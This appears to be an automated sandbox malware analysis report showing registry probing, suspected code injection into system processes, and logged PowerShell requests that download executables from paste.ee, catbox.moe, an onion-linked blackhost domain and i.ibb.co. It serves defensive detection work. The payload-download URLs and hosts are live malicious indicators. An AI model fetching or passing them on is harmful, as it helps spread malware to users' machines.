Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E6D7B0 FindFirstFileExW,	2_2_000001CB53E6D7B0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC4D7B0 FindFirstFileExW,	7_2_000001498BC4D7B0
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB4297D7B0 FindFirstFileExW,	20_2_000001EB4297D7B0
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF969D7B0 FindFirstFileExW,	21_2_0000018AF969D7B0
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB7D7B0 FindFirstFileExW,	22_2_000002D6CEB7D7B0

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: i.ibb.co

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 127.0.0.1

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Found Tor onion address

Source: powershell.exe, 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: qahttps://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/srv/fup/uploads/DRGDF.HGFG
Source: powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: https://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/srv/fup/uploads/DRGDF.HGFG

Performs DNS queries to domains with low reputation

Source:

DNS query: www.blackhost.xyz

Source: global traffic

TCP traffic: 192.168.2.4:55589 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 23.186.113.60 23.186.113.60
Source: Joe Sandbox View	IP Address: 108.181.20.35 108.181.20.35
Source: Joe Sandbox View	IP Address: 91.134.10.182 91.134.10.182
Source: Joe Sandbox View	IP Address: 91.134.82.79 91.134.82.79

Source: Joe Sandbox View

ASN Name: FASTWEBIT FASTWEBIT

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49713 -> 23.186.113.60:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49716 -> 108.181.20.35:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49719 -> 2.238.145.99:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 108.181.20.35:443 -> 192.168.2.4:49716
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 2.238.145.99:443 -> 192.168.2.4:49719
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49721 -> 108.181.20.35:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49721 -> 108.181.20.35:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 108.181.20.35:443 -> 192.168.2.4:49721

Source: global traffic	HTTP traffic detected: GET /d/linhgh7d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cfuoi8.fuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /srv/fup/uploads/DRGDF.HGFG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.blackhost.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /n8nug3.fuck HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moe

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/linhgh7d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cfuoi8.fuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /srv/fup/uploads/DRGDF.HGFG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.blackhost.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /n8nug3.fuck HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moe
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: files.catbox.moe
Source: global traffic	DNS traffic detected: DNS query: www.blackhost.xyz
Source: global traffic	DNS traffic detected: DNS query: i.ibb.co

Source: lsass.exe, 00000016.00000000.1356206662.000002D6CE450000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356303214.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356524069.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2463085683.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000016.00000002.2454969370.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356303214.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2454969370.000002D6CE4F0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356524069.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2463085683.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: powershell.exe, 00000003.00000002.1366751494.00000000073F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000003.00000002.1368155002.0000000007488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft9%x
Source: svchost.exe, 00000004.00000002.2481787005.0000014F1C80F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000016.00000000.1356206662.000002D6CE450000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356303214.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356524069.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2463085683.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000016.00000002.2454969370.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356303214.000002D6CE4BA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2454969370.000002D6CE4F0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1356524069.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2463085683.000002D6CE5AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000016.00000002.2437177865.000002D6CDC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355733785.000002D6CDC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000016.00000002.2446099419.000002D6CE400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355986280.000002D6CE400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000016.00000002.2435366666.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355663816.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000004.00000003.1203397070.0000014F1C6C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1203397070.0000014F1C6C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1203397070.0000014F1C6C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1203397070.0000014F1C6FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://files.catbox.moe
Source: SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.ibb.co
Source: powershell.exe, 00000003.00000002.1360704931.00000000059FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1247032360.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1436533880.0000026A5A13C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
